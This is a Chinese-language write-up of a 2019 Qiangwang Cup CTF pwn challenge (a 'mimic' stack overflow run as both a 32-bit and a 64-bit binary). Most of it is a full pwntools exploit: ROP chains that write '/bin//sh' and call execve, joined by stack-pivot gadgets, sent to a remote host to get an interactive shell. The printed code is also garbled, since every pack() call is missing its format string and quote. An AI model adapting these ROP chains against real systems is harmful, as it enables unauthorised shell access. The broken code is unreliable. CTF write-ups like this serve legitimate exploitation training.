强网杯2019 拟态 STKOF

强网杯2019 拟态 STKOF

查看保护


栈溢出漏洞，但是这里加上了一个拟态防御。拟态防御其实就是对比32位和64位的输出或者看哪个程序crash掉，不一样则报错。
通俗易懂的来说其实就是exp可能打通过32位又可以打通过64位。
攻击思路：这一题目的话只是一个简单的栈溢出漏洞。又是静态链接来的所以可以找到很多的gadgets。这里的32位和64的payload直接用ropgadget生成的。改一下重复的就行了p += pack('这个就可以直接代替inc eax
改完32和64的payload之后就是先加上32位的偏移。因为32位到ret为0x10c + 4而64位为0x10c + 8
这里差了4。所以可以借助add esp来进行一个栈迁移。
首先使用add esp, 0xc将32的payload迁移到 64位的ret后面。填一下0x4，接着将64位的ret使用add esp, 0xd8。将64位的payload给栈迁移到32位的payload后面。注意 使用\x00来截断
这样一来无论是32位和64位都可以用这一个exp来打通

from pwn import *
from struct import pack
#context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r02'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25948)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

# Padding goes here
p = b''

p += pack(', 0x0806e9cb) # pop edx ; ret
p += pack(', 0x080d9060) # @ .data
p += pack(', 0x080a8af6) # pop eax ; ret
p += b'/bin'
p += pack(', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack(', 0x0806e9cb) # pop edx ; ret
p += pack(', 0x080d9064) # @ .data + 4
p += pack(', 0x080a8af6) # pop eax ; ret
p += b'//sh'
p += pack(', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack(', 0x0806e9cb) # pop edx ; ret
p += pack(', 0x080d9068) # @ .data + 8
p += pack(', 0x08056040) # xor eax, eax ; ret
p += pack(', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack(', 0x080481c9) # pop ebx ; ret
p += pack(', 0x080d9060) # @ .data
p += pack(', 0x0806e9f2) # pop ecx ; pop ebx ; ret
p += pack(', 0x080d9068) # @ .data + 8
p += pack(', 0x080d9060) # padding without overwrite ebx
p += pack(', 0x0806e9cb) # pop edx ; ret
p += pack(', 0x080d9068) # @ .data + 8
p += pack(', 0x08056040) # xor eax, eax ; ret
p += pack(', 0x080a8af6) # pop eax ; ret
p += p32(0xb)
p += pack(', 0x080495a3) # int 0x80

payload32 = p
print(len(payload32))

#r.sendline(b'a' * (0x10c + 4) + payload32)

p = b''

p += pack(', 0x0000000000405895) # pop rsi ; ret
p += pack(', 0x00000000006a10e0) # @ .data
p += pack(', 0x000000000043b97c) # pop rax ; ret
p += b'/bin//sh'
p += pack(', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack(', 0x0000000000405895) # pop rsi ; ret
p += pack(', 0x00000000006a10e8) # @ .data + 8
p += pack(', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack(', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack(', 0x00000000004005f6) # pop rdi ; ret
p += pack(', 0x00000000006a10e0) # @ .data
p += pack(', 0x0000000000405895) # pop rsi ; ret
p += pack(', 0x00000000006a10e8) # @ .data + 8
p += pack(', 0x000000000043b9d5) # pop rdx ; ret
p += pack(', 0x00000000006a10e8) # @ .data + 8
p += pack(', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack(', 0x000000000043b97c) # pop rax ; ret
p += p64(0x3b)
p += pack(', 0x00000000004011dc) # syscall
payload64 = p
print(len(payload64))

add_esp = 0x080a8f69 # add esp, 0xc ; ret

add_rsp = 0x00000000004079d4 # add rsp, 0xd8 ; ret

payload = b'a'.ljust(0x110, b'\x00') + p32(add_esp) + b'a' * 4 + p64(add_rsp) + payload32.ljust(0xd8,b'\x00') + payload64

r.sendline(payload)

r.interactive()

这里笔者还遇到了一个qipa东西。笔者直接用ropgadget生成的payload加上32位的偏移打远程的时候打一两次可以直接打通。。。。可能是因为首先打32位的时候直接拿到shell之后，远程的拟态裁决程序有时候crash不了（XD